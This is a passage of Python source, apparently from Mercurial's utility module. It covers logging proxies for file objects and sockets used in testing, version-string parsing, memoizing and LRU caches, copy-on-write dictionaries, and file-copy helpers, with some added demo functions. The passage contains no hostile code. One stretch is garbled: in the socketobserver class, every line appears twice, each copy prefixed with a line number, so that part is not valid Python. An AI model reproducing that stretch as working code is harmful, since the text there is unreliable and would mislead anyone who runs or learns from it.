    def read1(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read1', *args, **kwargs)

class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``. Because of this, we need to make
    ``bufferedinputpipe`` aware of these operations.

    This variation of ``bufferedinputpipe`` can notify observers about
    ``os.read()`` events. It also re-publishes other events, such as
    ``read()`` and ``readline()``.
    """
    def _fillbuffer(self):
        res = super(observedbufferedinputpipe, self)._fillbuffer()

        fn = getattr(self._input._observer, r'osread', None)
        if fn:
            fn(res, _chunksize)

        return res

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        res = super(observedbufferedinputpipe, self).read(size)

        fn = getattr(self._input._observer, r'bufferedread', None)
        if fn:
            fn(res, size)

        return res

    def readline(self, *args, **kwargs):
        res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

        fn = getattr(self._input._observer, r'bufferedreadline', None)
        if fn:
            fn(res)

        return res

PROXIED_SOCKET_METHODS = {
    r'makefile',
    r'recv',
    r'recvfrom',
    r'recvfrom_into',
    r'recv_into',
    r'send',
    r'sendall',
    r'sendto',
    r'setblocking',
    r'settimeout',
    r'gettimeout',
    r'setsockopt',
}

class socketproxy(object):
    """A proxy around a socket that tells a watcher when events occur.

    This is like ``fileobjectproxy`` except for sockets.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, sock, observer):
        object.__setattr__(self, r'_orig', sock)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        if name in PROXIED_SOCKET_METHODS:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def makefile(self, *args, **kwargs):
        res = object.__getattribute__(self, r'_observedcall')(
            r'makefile', *args, **kwargs)

        # The file object may be used for I/O. So we turn it into a
        # proxy using our observer.
        observer = object.__getattribute__(self, r'_observer')
        return makeloggingfileobject(observer.fh, res, observer.name,
                                     reads=observer.reads,
                                     writes=observer.writes,
                                     logdata=observer.logdata,
                                     logdataapis=observer.logdataapis)

    def recv(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recv', *args, **kwargs)

    def recvfrom(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom', *args, **kwargs)

    def recvfrom_into(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom_into', *args, **kwargs)

    def recv_into(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recv_into', *args, **kwargs)

    def send(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'send', *args, **kwargs)

    def sendall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendall', *args, **kwargs)

    def sendto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendto', *args, **kwargs)

    def setblocking(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setblocking', *args, **kwargs)

    def settimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'settimeout', *args, **kwargs)

    def gettimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'gettimeout', *args, **kwargs)

    def setsockopt(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setsockopt', *args, **kwargs)

class baseproxyobserver(object):
    def _writedata(self, data):
        if not self.logdata:
            if self.logdataapis:
                self.fh.write('\n')
                self.fh.flush()
            return

        # Simple case writes all data on a single line.
        if b'\n' not in data:
            if self.logdataapis:
                self.fh.write(': %s\n' % stringutil.escapestr(data))
            else:
                self.fh.write('%s> %s\n'
                              % (self.name, stringutil.escapestr(data)))
            self.fh.flush()
            return

        # Data with newlines is written to multiple lines.
        if self.logdataapis:
            self.fh.write(':\n')

        lines = data.splitlines(True)
        for line in lines:
            self.fh.write('%s> %s\n'
                          % (self.name, stringutil.escapestr(line)))
        self.fh.flush()

class fileobjectobserver(baseproxyobserver):
    """Logs file object activity."""
    def __init__(self, fh, name, reads=True, writes=True, logdata=False,
                 logdataapis=True):
        self.fh = fh
        self.name = name
        self.logdata = logdata
        self.logdataapis = logdataapis
        self.reads = reads
        self.writes = writes

    def read(self, res, size=-1):
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = ''

        if size == -1 and res == '':
            # Suppress pointless read(-1) calls that return
            # nothing. These happen _a lot_ on Python 3, and there
            # doesn't seem to be a better workaround to have matching
            # Python 2 and 3 behavior. :(
            return

        if self.logdataapis:
            self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))

        self._writedata(res)

    def readline(self, res, limit=-1):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readline() -> %d' % (self.name, len(res)))

        self._writedata(res)

    def readinto(self, res, dest):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
                                                      res))

        data = dest[0:res] if res is not None else b''
        self._writedata(data)

    def write(self, res, data):
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3 (reasonably)
        # returns the integer bytes written.
        if res is None and data:
            res = len(data)

        if self.logdataapis:
            self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))

        self._writedata(data)

    def flush(self, res):
        if not self.writes:
            return

        self.fh.write('%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedread(%d) -> %d' % (
                self.name, size, len(res)))

        self._writedata(res)

    def bufferedreadline(self, res):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedreadline() -> %d' % (
                self.name, len(res)))

        self._writedata(res)

def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
                          logdata=False, logdataapis=True):
    """Turn a file object into a logging file object."""

    observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
                                  logdata=logdata, logdataapis=logdataapis)
    return fileobjectproxy(fh, observer)
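
# A short sketch with hypothetical handles: mirror every read and write on
# fh into a trace log, escaping the payload, much as the wire protocol
# tests do.
#
#     tracefh = open(b'trace.log', 'wb')
#     proxied = makeloggingfileobject(tracefh, fh, b'client', logdata=True)
#     proxied.write(b'hello')  # trace.log gets "client> write(5) -> 5: hello"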
866 class socketobserver(baseproxyobserver):
866 class socketobserver(baseproxyobserver):
867 """Logs socket activity."""
867 """Logs socket activity."""
868 def __init__(self, fh, name, reads=True, writes=True, states=True,
868 def __init__(self, fh, name, reads=True, writes=True, states=True,
869 logdata=False, logdataapis=True):
869 logdata=False, logdataapis=True):
870 self.fh = fh
870 self.fh = fh
871 self.name = name
871 self.name = name
872 self.reads = reads
872 self.reads = reads
873 self.writes = writes
873 self.writes = writes
874 self.states = states
874 self.states = states
875 self.logdata = logdata
875 self.logdata = logdata
876 self.logdataapis = logdataapis
876 self.logdataapis = logdataapis
877
877
878 def makefile(self, res, mode=None, bufsize=None):
878 def makefile(self, res, mode=None, bufsize=None):
879 if not self.states:
879 if not self.states:
880 return
880 return
881
881
882 self.fh.write('%s> makefile(%r, %r)\n' % (
882 self.fh.write('%s> makefile(%r, %r)\n' % (
883 self.name, mode, bufsize))
883 self.name, mode, bufsize))
884
884
885 def recv(self, res, size, flags=0):
885 def recv(self, res, size, flags=0):
886 if not self.reads:
886 if not self.reads:
887 return
887 return
888
888
889 if self.logdataapis:
889 if self.logdataapis:
890 self.fh.write('%s> recv(%d, %d) -> %d' % (
890 self.fh.write('%s> recv(%d, %d) -> %d' % (
891 self.name, size, flags, len(res)))
891 self.name, size, flags, len(res)))
892 self._writedata(res)
892 self._writedata(res)
893
893
894 def recvfrom(self, res, size, flags=0):
894 def recvfrom(self, res, size, flags=0):
895 if not self.reads:
895 if not self.reads:
896 return
896 return
897
897
898 if self.logdataapis:
898 if self.logdataapis:
899 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
899 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
900 self.name, size, flags, len(res[0])))
900 self.name, size, flags, len(res[0])))
901
901
902 self._writedata(res[0])
902 self._writedata(res[0])
903
903
904 def recvfrom_into(self, res, buf, size, flags=0):
904 def recvfrom_into(self, res, buf, size, flags=0):
905 if not self.reads:
905 if not self.reads:
906 return
906 return
907
907
908 if self.logdataapis:
908 if self.logdataapis:
909 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
909 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
910 self.name, size, flags, res[0]))
910 self.name, size, flags, res[0]))
911
911
912 self._writedata(buf[0:res[0]])
912 self._writedata(buf[0:res[0]])
913
913
914 def recv_into(self, res, buf, size=0, flags=0):
914 def recv_into(self, res, buf, size=0, flags=0):
915 if not self.reads:
915 if not self.reads:
916 return
916 return
917
917
918 if self.logdataapis:
918 if self.logdataapis:
919 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
919 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
920 self.name, size, flags, res))
920 self.name, size, flags, res))
921
921
922 self._writedata(buf[0:res])
922 self._writedata(buf[0:res])
923
923
924 def send(self, res, data, flags=0):
924 def send(self, res, data, flags=0):
925 if not self.writes:
925 if not self.writes:
926 return
926 return
927
927
928 self.fh.write('%s> send(%d, %d) -> %d' % (
928 self.fh.write('%s> send(%d, %d) -> %d' % (
929 self.name, len(data), flags, len(res)))
929 self.name, len(data), flags, len(res)))
930 self._writedata(data)
930 self._writedata(data)
931
931
932 def sendall(self, res, data, flags=0):
932 def sendall(self, res, data, flags=0):
933 if not self.writes:
933 if not self.writes:
934 return
934 return
935
935
936 if self.logdataapis:
936 if self.logdataapis:
937 # Returns None on success. So don't bother reporting return value.
937 # Returns None on success. So don't bother reporting return value.
938 self.fh.write('%s> sendall(%d, %d)' % (
938 self.fh.write('%s> sendall(%d, %d)' % (
939 self.name, len(data), flags))
939 self.name, len(data), flags))
940
940
941 self._writedata(data)
941 self._writedata(data)
942
942
943 def sendto(self, res, data, flagsoraddress, address=None):
943 def sendto(self, res, data, flagsoraddress, address=None):
944 if not self.writes:
944 if not self.writes:
945 return
945 return
946
946
947 if address:
947 if address:
948 flags = flagsoraddress
948 flags = flagsoraddress
949 else:
949 else:
950 flags = 0
950 flags = 0
951
951
952 if self.logdataapis:
952 if self.logdataapis:
953 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
953 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
954 self.name, len(data), flags, address, res))
954 self.name, len(data), flags, address, res))
955
955
956 self._writedata(data)
956 self._writedata(data)
957
957
958 def setblocking(self, res, flag):
958 def setblocking(self, res, flag):
959 if not self.states:
959 if not self.states:
960 return
960 return
961
961
962 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
962 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
963
963
964 def settimeout(self, res, value):
964 def settimeout(self, res, value):
965 if not self.states:
965 if not self.states:
966 return
966 return
967
967
968 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
968 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
969
969
970 def gettimeout(self, res):
970 def gettimeout(self, res):
971 if not self.states:
971 if not self.states:
972 return
972 return
973
973
974 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
974 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
975
975
    def setsockopt(self, res, level, optname, value):
        if not self.states:
            return

        # like the other observer methods, take the call result as the first
        # argument; the format string below reports it after the arguments
        self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
            self.name, level, optname, value, res))

def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
                      logdata=False, logdataapis=True):
    """Turn a socket into a logging socket."""

    observer = socketobserver(logh, name, reads=reads, writes=writes,
                              states=states, logdata=logdata,
                              logdataapis=logdataapis)
    return socketproxy(fh, observer)

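# Illustrative sketch (not part of the original module): wrapping an
# in-memory file object with makeloggingfileobject. The _demo* name is
# hypothetical, and the exact log text depends on fileobjectobserver's
# formatting, so the sketch only checks that something was logged.
def _demologgingfileobject():
    import io
    logh = io.BytesIO()
    fh = io.BytesIO()
    # every read()/write() on the proxy is forwarded to fh and logged to logh
    proxy = makeloggingfileobject(logh, fh, 'demo', logdata=True)
    proxy.write('hello')
    assert fh.getvalue() == 'hello'
    assert logh.getvalue()          # e.g. "demo> write(...)" style records
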
def version():
    """Return version information if available."""
    try:
        from . import __version__
        return __version__.version
    except ImportError:
        return 'unknown'

def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')

    >>> versiontuple(b'4.6rc0')
    (4, 6, None, 'rc0')
    >>> versiontuple(b'4.6rc0+12-425d55e54f98')
    (4, 6, None, 'rc0+12-425d55e54f98')
    >>> versiontuple(b'.1.2.3')
    (None, None, None, '.1.2.3')
    >>> versiontuple(b'12.34..5')
    (12, 34, None, '..5')
    >>> versiontuple(b'1.2.3.4.5.6')
    (1, 2, 3, '.4.5.6')
    """
    if not v:
        v = version()
    m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
    if not m:
        vparts, extra = '', v
    elif m.group(2):
        vparts, extra = m.groups()
    else:
        vparts, extra = m.group(1), None

    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)

def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keywords args
    if func.__code__.co_argcount == 0:
        cache = []
        def f():
            if len(cache) == 0:
                cache.append(func())
            return cache[0]
        return f
    cache = {}
    if func.__code__.co_argcount == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def f(arg):
            if arg not in cache:
                cache[arg] = func(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                cache[args] = func(*args)
            return cache[args]

    return f

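# Illustrative sketch (not part of the original module): cachefunc memoizes
# on positional arguments only, so a repeated call is served from the cache.
# The _demo* name and the sample function are hypothetical.
def _democachefunc():
    calls = []
    def square(x):
        calls.append(x)
        return x * x
    square = cachefunc(square)
    assert square(3) == 9
    assert square(3) == 9
    assert calls == [3]     # the second call never reached the function
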
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        if getattr(self, '_copied', 0):
            self._copied -= 1
            return self.__class__(self)
        return self

    def copy(self):
        """always do a cheap copy"""
        self._copied = getattr(self, '_copied', 0) + 1
        return self

class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v

class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """

class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """

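# Illustrative sketch (not part of the original module): the copy-on-write
# pattern above. copy() is O(1); the actual copy is deferred until a writer
# calls preparewrite(). The _demo* name is hypothetical.
def _democowdict():
    d = cowdict()
    d = d.preparewrite()            # no outstanding copies: returns d itself
    d['key'] = 'value'
    snapshot = d.copy()             # cheap: just marks d as shared
    d = d.preparewrite()            # now a real copy is made for the writer
    d['key'] = 'changed'
    assert snapshot['key'] == 'value'
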
class transactional(object):
    """Base class for making a transactional type into a context manager."""
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        try:
            if exc_type is None:
                self.close()
        finally:
            self.release()

@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns.
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        tr.close()
        raise
    finally:
        tr.release()

@contextlib.contextmanager
def nullcontextmanager():
    yield

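# Illustrative sketch (not part of the original module): a minimal
# transactional subclass driven through acceptintervention. On a clean exit
# the transaction is closed, then released. The _demo* names are
# hypothetical.
def _demotransactional():
    class demotr(transactional):
        closed = released = False
        def close(self):
            self.closed = True
        def release(self):
            self.released = True
    tr = demotr()
    with acceptintervention(tr):
        pass                        # the transaction body would go here
    assert tr.closed and tr.released
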
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        self.next = None
        self.prev = None

        self.key = _notset
        self.value = None

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset

class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.
    """
    def __init__(self, max):
        self._cache = {}

        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self._capacity = max

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def __setitem__(self, k, v):
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            node.value = v
            self._movetohead(node)
            return

        if self._size < self._capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

        # At capacity. Kill the old entry.
        if node.key is not _notset:
            del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

    def __delitem__(self, k):
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        try:
            return self._cache[k].value
        except KeyError:
            return default

    def clear(self):
        n = self._head
        while n.key is not _notset:
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self):
        result = lrucachedict(self._capacity)
        n = self._head.prev
        # Iterate in oldest-to-newest order, so the copy has the right ordering
        for i in range(len(self._cache)):
            result[n.key] = n.value
            n = n.prev
        return result

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node

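# Illustrative sketch (not part of the original module): LRU behavior of
# lrucachedict. Touching a key refreshes it, so the least recently used
# entry is the one evicted at capacity. The _demo* name is hypothetical.
def _demolrucachedict():
    d = lrucachedict(2)
    d['a'] = 1
    d['b'] = 2
    d['a']                          # refresh 'a'; 'b' is now the oldest
    d['c'] = 3                      # at capacity: evicts 'b'
    assert 'b' not in d
    assert d.get('a') == 1 and d.get('c') == 3
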
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()
    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            else:
                order.remove(arg)
            order.append(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            else:
                order.remove(args)
            order.append(args)
            return cache[args]

    return f

class propertycache(object):
    def __init__(self, func):
        self.func = func
        self.name = func.__name__
    def __get__(self, obj, type=None):
        result = self.func(obj)
        self.cachevalue(obj, result)
        return result

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value

def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    if prop in obj.__dict__:
        del obj.__dict__[prop]

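# Illustrative sketch (not part of the original module): propertycache is a
# non-data descriptor, so after the first access the value stored in the
# instance __dict__ shadows it until clearcachedproperty drops the cached
# value. The _demo* names are hypothetical.
def _demopropertycache():
    class thing(object):
        runs = 0
        @propertycache
        def answer(self):
            self.runs += 1
            return 42
    t = thing()
    assert t.answer == 42
    assert t.answer == 42
    assert t.runs == 1              # computed once, then read from __dict__
    clearcachedproperty(t, 'answer')
    assert t.answer == 42 and t.runs == 2
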
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def log2(x):
        if not x:
            return 0
        i = 0
        while x:
            x >>= 1
            i += 1
        return i - 1

    buf = []
    blen = 0
    for chunk in source:
        buf.append(chunk)
        blen += len(chunk)
        if blen >= min:
            if min < max:
                min = min << 1
                nmin = 1 << log2(blen)
                if nmin > min:
                    min = nmin
                if min > max:
                    min = max
            yield ''.join(buf)
            blen = 0
            buf = []
    if buf:
        yield ''.join(buf)

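# Illustrative sketch (not part of the original module): increasingchunks
# coalesces many small pieces into progressively larger chunks while
# preserving the stream's contents. The _demo* name is hypothetical.
def _demoincreasingchunks():
    pieces = ['x' * 100] * 50               # 5000 bytes in 100-byte pieces
    chunks = list(increasingchunks(pieces, min=1024, max=4096))
    assert ''.join(chunks) == ''.join(pieces)
    assert all(len(c) >= 1024 for c in chunks[:-1])
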
def always(fn):
    return True

def never(fn):
    return False

def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue has been fixed in 2.7. But it still affects
    CPython's performance.
    """
    def wrapper(*args, **kwargs):
        gcenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            if gcenabled:
                gc.enable()
    return wrapper

if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    nogc = lambda x: x

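# Illustrative sketch (not part of the original module): nogc pauses the
# collector for the duration of the call and restores its previous state
# afterwards (on CPython; on PyPy nogc is a no-op, so the demo bails out).
# The _demo* name is hypothetical.
def _demonogc():
    if pycompat.ispypy:
        return
    @nogc
    def buildbig():
        assert not gc.isenabled()   # collector paused inside the call
        return [{} for _ in range(1000)]
    gc.enable()
    buildbig()
    assert gc.isenabled()           # previous state restored
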
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it is assumed to be relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'

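# Illustrative sketch (not part of the original module): pathto with a
# relative n1, which is interpreted relative to root. The _demo* name is
# hypothetical.
def _demopathto():
    # from the directory a/b inside the repo to the repo-relative file
    # a/c.txt: one step up, then down to c.txt
    rel = pathto('/repo', os.path.join('a', 'b'), 'a/c.txt')
    assert rel == os.path.join('..', 'c.txt')
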
# the location of data files matching the source code
if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

i18n.setdatapath(datapath)

def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
                raise error.SignatureError
            raise

    return check

# a whitelist of known filesystems where hardlinks work reliably
_hardlinkfswhitelist = {
    'apfs',
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'NTFS',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}

def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't
        # needed for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
                if oldstat and oldstat.stat:
                    newstat = filestat.frompath(dest)
                    if newstat.isambig(oldstat):
                        # stat of copied file is ambiguous to original one
                        advanced = (
                            oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                        os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise error.Abort(str(inst))

def copyfiles(src, dst, hardlink=None, progress=None):
    """Copy a directory tree using hardlinks if possible."""
    num = 0

    def settopic():
        if progress:
            progress.topic = _('linking') if hardlink else _('copying')

    if os.path.isdir(src):
